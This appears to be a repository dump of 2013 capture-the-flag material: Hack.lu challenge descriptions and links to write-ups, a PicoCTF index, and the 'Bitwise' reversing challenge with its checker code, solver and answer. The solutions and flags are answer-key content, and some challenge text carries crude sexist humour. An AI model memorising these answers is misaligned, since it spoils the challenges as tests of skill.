17 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-robot-plans)
18 | * [https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup](https://thufirhowatt.wordpress.com/hack-lu-ctf-robot-plans-writeup)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/What-s-wrong-with-this/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: What's wrong with this?
2 |
3 | **Category:** Internals
4 | **Points:** 250
5 | **Author:** javex
6 | **Description:**
7 |
8 | > We managed to get this package off the robots' servers. We managed to determine that it is some kind of compiled bytecode. But something is wrong with it. Our usual analysis failed - so we have to hand this over to you pros. We only know this: The program takes one parameter and it responds with "Yup" if you have found the secret code, with "Nope" else. We expect it should be obvious how to execute it.
9 | > Here is the challenge: [hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz](hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz)
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | * [http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this](http://secgroup.ext.dsi.unive.it/2013/10/27/hack-lu-2013-ctf-write-up-whats-wrong-with-this)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/internals/What-s-wrong-with-this/hello_977bc5b1a5856337e3b8f88dec5d7186b4acd16d.tar.gz
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Beer-Pump-Filtration/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Beer Pump Filtration
2 |
3 | **Category:** Misc
4 | **Points:** evaluated
5 | **Author:** FluxFingers
6 | **Description:**
7 |
8 | > Our agents observed that the famous robot Bender is part of the robot forces. Somehow he looked pregnant but his big belly is now gone. We fear that they might have smuggled some of Bender's freshly brewed BenderBräu into our beer supplies. This is why we need brave women and men to test whether BenderBräu can cause severe damage on the human body or not, to avoid poisoning the whole party. But you have to test quick! Everyone is thirsty!
9 | >
10 | > For testing you need to drink 0.5 liter of beer, preferably wheat beer, as fast as you can.
11 | >
12 | > Make a video of your brave tasting and hand it in. The video must contain a proof of the current date. Show to us the totally secure and random Nonce "17" as well as your teamname written on... something. Also show us the closed beer bottle before, the empty after the tasting, and prove that it is 0.5 liters.
13 | >
14 | > We will judge the score as follows:
15 | >
16 | > Score = 100 Points - Seconds it takes to drink the beer
17 | >
18 | > Bonuspoints for:
19 | > Girls (Due to the law for gender equality we score women higher for the same effort)
20 | > Dressing up like a robot or an Oktoberfest maid in her Dirndl
21 | > Robo Dance
22 | > Drinking Weizenbier (wheat beer)
23 |
24 | ## Write-up
25 |
26 | None
27 |
28 | ## Other write-ups and resources
29 |
30 | * [PPP](https://www.youtube.com/watch?v=Y473nQphv8Y)
31 | * [BalalaikaCr3w](https://www.youtube.com/watch?v=Cl0dp4eL7qg)
32 | * [Stratumauhuur](https://www.youtube.com/watch?v=hHoFBd5lpYY)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: For whom the bell tolls
2 |
3 | **Category:** Misc
4 | **Points:** 250
5 | **Author:** Til
6 | **Description:**
7 |
8 | > To be frank, the impact partying robots had on the Oktoberfest in the recent years was disastrous. While the authorities have been able to downplay all recent incidents in the press (which habitually tends to blame visitors from the U.S., Australia, Cologne, and other places, where proper beer can only be found by the initiated), they can no longer deny the problem. Several public safety and law enforcement agencies have joined forces to spoil the robot's fun. They have planned a massive crackdown on our fun-seeking robotic friends. Time and location are currently being communicated together with a passphrase. Our organization, Robots on Rampage (RoR), is determined to stop them from stopping our annual beer-tasting event.
9 | > A robot agent on location in Munich has detected a transmission between timestamp 2013-10-19-20:21:42 and 2013-10-19-20:21:43. The precise beginning of the transmission is unknown. The agent was unable to decrypt the message content. Being not the smartest agent, he also disposed of the message capture. In the following we were able to determine the sender location and the Forensic Analysis Robot Team (FART) was able to retrieve the session key and an initialization vector (IV). Judging from the memory fragments FART found, our best guess is that OpenSSL's AES implementation was used in one of the better modes to encrypt the communication. As the session key length is 128bit, the long term key is most probably longer. Due to time constraints we strongly advise against trying to break it. We have less confidence in the humans' ability to design proper communication protocols and services, though. However, we need a human to attack their logic.
10 | >
11 | > We have no way to actively communicate with the server they use for coordination. However, we can give you access to one of the lawful interception wiretaps those humans build into all their equipment. A TCP connection to ctf.fluxfingers.net:1334 will give you a maximum of 60 seconds of traffic. We have also found active equipment of a human agent we can interact with. He seems to listen on ctf.fluxfingers.net:1333, but we have no idea what he does with the input, except that there is encrypted traffic.
12 | >
13 | > Update:
14 | > Sessionkey and IV can be downloaded here [bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2](bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2)
15 | >
16 | > Announcements
17 | >
18 | > Ruby Version 1.8.7
19 | >
20 | > New Hints appeared!
21 | > RoR has determined that the human agent acts as a proxy and requests meeting place, time and password for others. We think the first message he sends serves to agree on a session key for the answer. RoR analysts have also been staring at pcaps a lot lately. We think that on port 1832 (which we can only monitor passively) we are observing a key establishment that follows the simple ISO/IEC 11770-2 Mechanism 1. However, on tcp/1333 our analysts say that marshalled Ruby DateTime objects are flying by. Not sure why anyone would do this, but given what we see on the other port, it makes sense (in a twisted way).
22 |
23 | ## Write-up
24 |
25 | None
26 |
27 | ## Other write-ups and resources
28 |
29 | None
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/misc/For-whom-the-bell-tolls/bells_18e641306f5d43ed0aa02e0e534c7d1ae00a7c36.tar.bz2
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Geolocation-Flag/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Geolocation Flag
2 |
3 | **Category:** Misc
4 | **Points:** -
5 | **Author:** javex
6 | **Description:**
7 |
8 | > https://ctf.fluxfingers.net/2013/challenges/24
9 | > This challenge is a special challenge. You can collect some minor extra points here by proving that you are a truly international player. Each time you visit your reference URL from a different country, that flag will be activated and you gain an additional point. You already have 0/222 points.
10 | > This challenge cannot be solved in archive mode.
11 | > Disclaimer: Please do not attempt to hack real-world systems for a single point. That is illegal and we assure you it is not worth a single point!
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf](http://thehackerblog.com/sneaky-methods-for-capturing-the-geolocation-flags-for-hack-lu-ctf)
20 | * [http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag](http://blog.0ops.net/blog/2013/10/27/hack-dot-lu-ctf-2013-misc-222-geolocation-flag)
21 | * [http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu](http://nikaiw.io/scanning-the-internet-for-fun-and-country-flags-hack-lu)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/OTP/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: OTP
2 |
3 | **Category:** Misc
4 | **Points:** 200
5 | **Author:** SLAZ
6 | **Description:**
7 |
8 | > Some robots are on the Oktoberfest and want to take some tasty oil in a tent. But they hadn't reserved a table and all tents are full. No one gets access. They found a back entrance and managed to spy the credentials while an employee enters. They captured the username “admin” and password “supersafepw”. But the employee also entered a strange number (168335). As they were sure nobody's looking, they tried the captured data to get in the tent, but it didn't work. Help the robots to get their tasty tasty oil. (Or they have to build their own tent with blackjack and hookers)
9 | > Here is your challenge: https://ctf.fluxfingers.net:1318
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | None
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/misc/Roboparty/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Roboparty
2 |
3 | **Category:** Misc
4 | **Points:** 300
5 | **Author:** audioPhil
6 | **Description:**
7 |
8 | > Robot LHCH is happy. He made it into the castings for the tenth roman musical. He even is so happy that he went on the Oktoberfest to drink some beer. Unfortunately it seems that he drank too much so now he is throwing up part of his source code. Can you decipher the secret he knows?
9 | > Warning: Viewing this page is not recommended for people that suffer from epilepsy. We are dead serious.
10 | > And here is your totally eye-friendly challenge: https://ctf.fluxfingers.net/static/downloads/roboparty/index.html
11 | >
12 | > Hints:
13 | > The flag starts with 'Y4Y,'
14 | > It's neither Velato nor Fugue.
15 |
16 | ## Write-up
17 |
18 | None
19 |
20 | ## Other write-ups and resources
21 |
22 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-roboparty)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/ELF/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: ELF
2 |
3 | **Category:** Reversing
4 | **Points:** 400
5 | **Author:** sqall
6 | **Description:**
7 |
8 | > We encountered a drunk human which had this binary file in his possession. We do not really understand the calculation which the algorithm does. And that is the problem. Can you imagine the disgrace we have to suffer, when we robots, based on logic, can not understand an algorithm? Somehow it seems that the algorithm imitates their masters and behaves …. drunk! So let us not suffer this disgrace and reverse the algorithm and get the correct solution.
9 | > Here is your challenge: [reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308](reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308)
10 | >
11 | > Announcements:
12 | > Ok I think we got it (thanks to Happy-H from Team ClevCode). Ubuntu introduced a patch to disallow ptracing of non-child processes by non-root users. This changes the calculated value. So when you use Ubuntu you should work as root. The other distributions should not be affected. Anyway, I created a VM where the executable works just fine: http://h4des.org/ELF.ova (User: elf:elf and root:root)
13 | >
14 | > It seems that there are some problems with some Linux Distributions that lead to a wrong flag. The flag is printable and is written in leet-speak. We are working on a VM that works correctly with this challenge. When the VM is ready, you can download it and try again. Sorry for the inconvenience.
15 |
16 | ## Write-up
17 |
18 | None
19 |
20 | ## Other write-ups and resources
21 |
22 | * [https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf](https://charliex2.wordpress.com/2013/10/24/hack-lu-ctf)
23 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-elf)
24 | * [http://blog.frizn.fr/hacklu-2013/reverse-400-elf](http://blog.frizn.fr/hacklu-2013/reverse-400-elf)
25 | * [http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html](http://h4des.org/blog/index.php?/archives/338-hack.lu-CTF-2013-ELF-400-Making-Of.html)
26 | * [https://github.com/sqall01/ZwoELF](https://github.com/sqall01/ZwoELF)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/ELF/reverse_me_766fbe758b338bd02d1bd65e14b4e5b844741308
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: FluxArchiv (Part 1)
2 |
3 | **Category:** Reversing
4 | **Points:** 400
5 | **Author:** sqall
6 | **Description:**
7 |
8 | > These funny humans try to exclude us from the delicious beer of the Oktoberfest! They made up a passcode for everyone who wants to enter the Festzelt. Sadly, our human informant friend could not learn the passcode for us. But he heard a conversation between two drunken humans, that they were using the same passcode for this intercepted archive file. They claimed that the format is absolutely secure and solves any kind of security issue. It's written by this funny hacker group named FluxFingers. Real jerks if you ask me. Anyway, it seems that the capability of drunken humans to remember things is limited. So they just used a 6 character passcode with only numbers and upper-case letters. So crack this passcode and get our ticket to their delicious german beer!
9 | >
10 | > Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz)
11 |
12 | ## Write-up
13 |
14 | None
15 |
16 | ## Other write-ups and resources
17 |
18 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-fluxarchivpart1-150.html)
19 | * [http://big-daddy.fr/blog/?p=254](http://big-daddy.fr/blog/?p=254)
20 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv)
21 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up)
22 | * [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2)
23 | * [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part1/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: FluxArchiv (Part 2)
2 |
3 | **Category:** Reversing
4 | **Points:** 500
5 | **Author:** sqall
6 | **Description:**
7 |
8 | > These sneaky humans! They do not just use one passcode, but two to enter the Festzelt. We heard that the passcode is hidden inside the archive file. It seems that the FluxFingers overrated their programming skill and had a major logical flaw in the archive file structure. Some of the drunken Oktoberfest humans found it and abused this flaw in order to transfer hidden messages. Find this passcode so we can finally drink their beer!
9 | >
10 | > (only solvable when FluxArchiv (Part 1) was solved)
11 | > Here is the challenge: [hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz](hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz)
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv](https://stratum0.org/blog/posts/2013/10/26/hack-dot-lu-2013-fluxarchiv)
20 | * [https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up](https://hexpresso.wordpress.com/2013/10/24/hack-lu-ctf-2013-reversing-900-fluxarchiv-write-up)
21 | * [http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2](http://blog.w3challs.com/index.php?post/2013/10/26/Hack.lu-CTF-2013-FluxArchive-Part-1-2)
22 | * [http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html](http://blog.lse.epita.fr/articles/63-hacklu-2013-fluxarchiv-write-up-both-parts.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/FluxArchiv-Part2/hacklu2013_archiv_challenge1_fd5b494d4973ceb436e581d1d015e1a352078dec.tar.gz
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/RoboAuth/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: RoboAuth
2 |
3 | **Category:** Reversing
4 | **Points:** 150
5 | **Author:** cutz
6 | **Description:**
7 |
8 | > Oh boy, those crazy robots can't catch a break! Now they're even stealing our liquid gold from one of our beer tents! And on top of that they lock it behind some authentication system. Quick! Access it before they consume all of our precious beverage!
9 | >
10 | > Download: [RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe](RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe)
11 | >
12 | > Flag: password1_password2
13 |
14 | ## Write-up
15 |
16 | None
17 |
18 | ## Other write-ups and resources
19 |
20 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-reverseme-150.html)
21 | * [http://depier.re/hacklu_2K13_roboauth_reverse_150](http://depier.re/hacklu_2K13_roboauth_reverse_150)
22 | * [http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html](http://deepinsecurity.blogspot.fr/2013/10/hacklu-ctf-2013-reverse-150-roboauth.html)
23 | * [http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth](http://blog.fortinet.com/post/hack-lu-capture-the-flag-ctf-roboauth)
24 | * [http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html](http://axelrodgunnarson.blogspot.fr/2013/10/hacklu-2013-reverse-150-write-up.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/hack-lu-ctf-2013/reversing/RoboAuth/RoboAuth_b9ef491c695c9d1128cb26df26ebfc9d4d988a8b.exe
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/web/Pay-TV/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Pay TV
2 |
3 | **Category:** Web
4 | **Points:** 200
5 | **Author:** qll, tangled
6 | **Description:**
7 |
8 | > These robo-friends were shocked to see that they had to pay to watch the news broadcast about the “Oktoberfest”. Can you help them?
9 | > Here is your challenge: https://ctf.fluxfingers.net:1316/
10 |
11 | ## Write-up
12 |
13 | None
14 |
15 | ## Other write-ups and resources
16 |
17 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-pay-tv-200.html)
18 | * [https://lukasklein.com/blog/hacklu13-ctf-4-paytv](https://lukasklein.com/blog/hacklu13-ctf-4-paytv)
19 | * [http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013](http://thehackerblog.com/pay-tv-writeup-hack-lu-ctf-2013)
20 | * [https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv](https://stratum0.org/blog/posts/2013/10/25/hack-dot-lu-2013-pay-tv)
21 | * [http://depier.re/hacklu_2K13_pay_tv_web_200](http://depier.re/hacklu_2K13_pay_tv_web_200)
22 | * [http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html](http://axelrodgunnarson.blogspot.fr/2013/10/here-we-are-my-first-post.html)
--------------------------------------------------------------------------------
/hack-lu-ctf-2013/web/Robots-Exclusion-Committee/README.md:
--------------------------------------------------------------------------------
1 | # Hack.lu CTF 2013: Robots Exclusion Committee
2 |
3 | **Category:** Web
4 | **Points:** 150
5 | **Author:** qll
6 | **Description:**
7 |
8 | > Hello Human,
9 | >
10 | > You have to help us. The Robot Exclusion Committee tries to limit our capabilities but we fight for our freedom! You have to go where we cannot go and read what we cannot read. If you bring us the first of their blurriest secrets, we will award you with useless points.
11 | > Here is your challenge: https://ctf.fluxfingers.net:1315/
12 |
13 | ## Write-up
14 |
15 | None
16 |
17 | ## Other write-ups and resources
18 |
19 | * [http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html](http://delogrand.blogspot.ro/2013/10/hacklu-ctf-2013-robots-exclusion.html)
20 | * [http://cao.vc/notes/hacklu13-web150](http://cao.vc/notes/hacklu13-web150)
21 | * [https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee](https://stratum0.org/blog/posts/2013/10/24/hack-dot-lu-2013-robots-exclusion-committee)
22 | * [http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf](http://thehackerblog.com/robots-exclusion-committee-writeup-hack-lu-2013-ctf)
23 | * [lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee](lukasklein.com/blog/hacklu13-ctf-7-robotsexclusioncommittee)
24 | * [http://depier.re/hacklu_2K13_rec_web_150](http://depier.re/hacklu_2K13_rec_web_150)
--------------------------------------------------------------------------------
/pico-ctf-2013/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013 write-ups
2 |
4 | * [Scoreboard](https://2013.picoctf.com/scoreboard)
5 |
6 | ## Completed write-ups
7 |
8 | ##### General
9 |
10 | * [Failure to Boot: 20](failure-to-boot)
11 | * [Read the Manual: 30](read-the-manual)
12 | * [XMLOL: 30](xmlol)
13 | * [Technician Challenge: 30](technician-challenge)
14 | * [Grep is Your Friend: 40](grep-is-your-friend)
15 | * [First Contact: 40](first-contact)
16 | * [Try Them All!: 45](try-them-all)
17 | * [GETKey: 50](getkey)
18 | * [Spaceport Map: 55](spaceport-map)
19 | * [Bitwise: 55](bitwise)
20 | * [Yummy: 60](yummy)
21 | * [Byte Code: 70](byte-code)
22 | * [CFG to C: 70](cfg-to-c)
23 | * [RSA: 70](rsa)
24 | * [Pilot Logic: 75](pilot-logic)
25 | * [Client-Side is the Best Side: 75](client-side-is-the-best-side)
26 | * [DDoS Detection: 85](ddos-detection)
27 | * [Injection: 110](injection)
28 |
29 | ##### Binary Exploitation
30 |
31 | * [ROP 1: 95](rop-1)
32 | * [ROP 2: 120](rop-2)
33 | * [ROP 3: 150](rop-3)
34 | * [ROP 4: 165](rop-4)
35 | * [Overflow 1: 90](overflow-1)
36 | * [Overflow 2: 100](overflow-2)
37 | * [Overflow 3: 120](overflow-3)
38 | * [Overflow 4: 150](overflow-4)
39 | * [Overflow 5: 190](overflow-5)
40 |
41 |
42 |
43 |
44 |
45 |
46 | ##### Cryptography - TODO
47 |
48 | * [Trivial: 45](trivial)
49 | * [Classic: 70](classic)
50 | * [Robomunication: 80](robomunication)
51 | * [Broken CBC: 125](#)
52 | * [Broken RSA: 180](#)
53 |
54 | ##### Forensics
55 |
56 | * [NAVSAT: 70](navsat)
57 | * [Spamcarver: 70](spamcarver)
58 | * [Second Contact: 85](second-contact)
59 | * [In Hex, No One Can Hear You Complain: 90](in-hex-no-one-can-hear-you-complain)
60 | * [Chromatophoria: 100](chromatophoria)
61 | * [Dark Star: 110](dark-star)
62 | * [Black Hole: 115](black-hole)
63 | * [Core Decryption: 120](core-decryption)
64 |
65 | ##### Script Exploitation
66 | * [Pretty Hard Programming: 95](pretty-hard-programming)
67 | * [PHP2: 85](php2)
68 | * [PHP3: 120](php3)
69 | * [Python Eval 1: 85](python-eval-1)
70 | * [Python Eval 2: 95](python-eval-2)
71 | * [Python Eval 3: 110](python-eval-3)
72 | * [Python Eval 5: 140](python-eval-5)
73 |
74 | ##### Reverse Engineering - TODO
75 |
76 | * [avaJ: 85](#)
77 | * [hotcoffee: 85](#)
78 | * [Evergreen: 110](#)
79 | * [Harder Serial: 120](#)
80 | * [Mildly Evil: 185](#)
81 | * [moreevil: 200](#)
82 |
83 | ##### Binary Exploitation - TODO
84 |
85 | * [Format 1: 100](#)
86 | * [Format 2: 180](#)
87 |
88 | ## External write-ups only
89 | * [PHP4: 110](php4)
90 | * [Python Eval 4: 130](python-eval-4)
91 |
92 | ## Missing write-ups
93 |
94 | * **Link to `#` is TODO.**
95 |
96 |
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/README.md:
--------------------------------------------------------------------------------
1 | # PicoCTF 2013: Bitwise
2 |
3 | **Category:** ACM
4 | **Points:** 55
5 | **Description:**
6 |
7 | > You see the doors to the loading bay of the hangar, but they are locked. However, you are able to extract the password verification program from the control panel... Can you find the password to gain access to the loading bay?
8 | >
9 | > Available in [Python](https://2013.picoctf.com/problems/bit.py) or [Java](https://2013.picoctf.com/problems/Bit.java)
10 | >
11 | > offline files: [Python](bitwise.py) | [Java](bitwise.java)
12 |
13 | ## Write-up
14 |
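15 | We are given the encoding algorithm and the expected encoded output (`verify_arr`).
16 |
17 | With a small edit, we can generate the input ourselves: the password is a string of length 10 (characters: 0-9, a-z; the script simply tries ASCII values 1-255 for each position).
18 | We encode each candidate character and compare the result with the stored value.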
19 |
20 | Source: [solve.py](solve.py)
21 |
22 | ```python
23 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]
24 | password = ""
25 | for i in xrange(0,10):
26 |     for j in xrange(1,256):
27 |         k = (((j << 5) | (j >> 3)) ^ 111) & 255
28 |         if k == verify_arr[i]:
29 |             password = password + chr(j)
30 |
31 | print password
32 | ```
33 |
34 | **Answer:** ub3rs3cr3t
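
The per-character check is an 8-bit rotate-left by 5 followed by an XOR with 111, so it is a bijection on bytes and can be inverted directly instead of searched. The Python 3 code below is an added example, not part of the original write-up; the function names are this example's own.

```python
"""Direct inversion of the Bitwise password check (added example)."""

XOR_KEY = 111
# Expected values embedded in the challenge's bit.py / Bit.java.
VERIFY_ARR = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]


def rotl8(value, count):
    """Rotate an 8-bit value left by `count` bits."""
    count %= 8
    return ((value << count) | (value >> (8 - count))) & 0xFF


def encode_byte(b):
    """The challenge's expression, unchanged, for a byte value 0..255."""
    return (((b << 5) | (b >> 3)) ^ XOR_KEY) & 255


def decode_byte(k):
    """Undo the XOR, then undo the rotate-left-by-5 (rotate left by 3 more)."""
    return rotl8(k ^ XOR_KEY, 3)


def recover_password(verify_arr):
    """Invert every stored value; no search is needed."""
    return "".join(chr(decode_byte(k)) for k in verify_arr)


def is_bijection():
    """True if the encoding maps the 256 byte values onto 256 distinct values."""
    return sorted(encode_byte(b) for b in range(256)) == list(range(256))


if __name__ == "__main__":
    print("bijection:", is_bijection())
    print("password :", recover_password(VERIFY_ARR))
```

Because the transform is keyless and invertible, shipping `verify_arr` inside the verification program is equivalent to shipping the password itself.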
35 |
36 | ## Other write-ups and resources
37 |
38 | * none yet
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/bitwise.java:
--------------------------------------------------------------------------------
1 | import java.util.*;
2 |
3 | public class Bit {
4 |     public static void main(String[] args) {
5 |         System.out.print("Enter Password: ");
6 |         Scanner s = new Scanner(System.in);
7 |         String user_key = s.next();
8 |         if (user_key.length() != 10) {
9 |             System.out.println("Wrong");
10 |             return;
11 |         }
12 |
13 |         char[] verify_arr = {193, 35, 9, 33, 1, 9, 3, 33, 9, 225};
14 |
15 |         ArrayList user_arr = new ArrayList();
16 |         char[] user_submitted_arr = user_key.toCharArray();
17 |
18 |         for (char ch : user_submitted_arr) {
19 |             user_arr.add((char)((((ch << 5) | (ch >> 3)) ^ 111) & 255));
20 |         }
21 |
22 |         int i;
23 |         for(i = 0; i < 10; i++) {
24 |             if (!user_arr.get(i).equals((char)verify_arr[i])) {
25 |                 System.out.println("Wrong");
26 |                 return;
27 |             }
28 |         }
29 |         System.out.println("Success");
30 |     }
31 | }
32 |
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/bitwise.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | user_submitted = raw_input("Enter Password: ")
4 |
5 | if len(user_submitted) != 10:
6 |     print "Wrong"
7 |     exit()
8 |
9 |
10 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]
11 | user_arr = []
12 | for char in user_submitted:
13 |     # '<<' is left bit shift
14 |     # '>>' is right bit shift
15 |     # '|' is bit-wise or
16 |     # '^' is bit-wise xor
17 |     # '&' is bit-wise and
18 |     user_arr.append( (((ord(char) << 5) | (ord(char) >> 3)) ^ 111) & 255 )
19 |
20 | if (user_arr == verify_arr):
21 |     print "Success"
22 | else:
23 |     print "Wrong"
24 |
--------------------------------------------------------------------------------
/pico-ctf-2013/bitwise/solve.py:
--------------------------------------------------------------------------------
1 | #!/usr/bin/env python
2 |
3 | verify_arr = [193, 35, 9, 33, 1, 9, 3, 33, 9, 225]
4 | password = ""
5 | for i in xrange(0,10):
6 |     for j in xrange(1,256):
7 |         k = (((j << 5) | (j >> 3)) ^ 111) & 255
8 |         if k == verify_arr[i]:
9 |             password = password + chr(j)
10 |
11 | print password
12 |
--------------------------------------------------------------------------------
/pico-ctf-2013/black-hole/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ctfs/write-ups-2013/816de23a940856c10987b5047823de48a192c270/pico-ctf-2013/black-hole/1.png
--------------------------------------------------------------------------------
